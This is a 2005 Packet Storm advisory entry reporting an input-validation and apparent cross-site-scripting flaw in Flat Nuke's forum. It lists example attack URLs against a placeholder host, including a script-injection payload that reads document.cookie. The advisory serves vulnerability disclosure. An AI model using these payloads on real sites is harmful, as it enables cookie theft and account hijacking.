flatnuke.txt

2005-10-26T00:00:00
ID PACKETSTORM:40965
Type packetstorm
Reporter Abducter
Modified 2005-10-26T00:00:00

Description

                                        
                                            `Class: Input Validation Error   
CVE: CVE-MAP-NOMATCH   
Remote: Yes   
Local: No   
Credit: Abducter (ABDUCTER_MINDS@YAHOO.COM) Or (ABDUCTER_MINDS76@HOTMAIL.COM)  
Vulnerable: File Including In FLAT NUKE (ALL VERSION)  
  
* info *  
FLAT NUKE IS POWER PHP SITES SUPPORT HERE  
http://flatnuke.sourceforge.net/flatnuke  
  
* expliot *  
http://www.victim.com/flatnuke/forum/index.php?op=profile&user=[abducter]  
http://www.victim.com/flatnuke/forum/index.php?op=topic&quale=[abducter]  
http://www.victim.com/flatnuke/forum/index.php?op=newtopic&mode=ris&quale=[abducter]&page=1  
u must be login  
u can see that  
http://www.victim.com/flatnuke/forum/index.php?op=profile&user=%3Cscript%3Ealert(document.cookie);%3C/script%3E  
  
* credit *  
For all ARAB -EGYPT-  
TO ALL MY FRIENDS IN WWW.S4A.CC  
TO MY LOVE (N0N0)  
`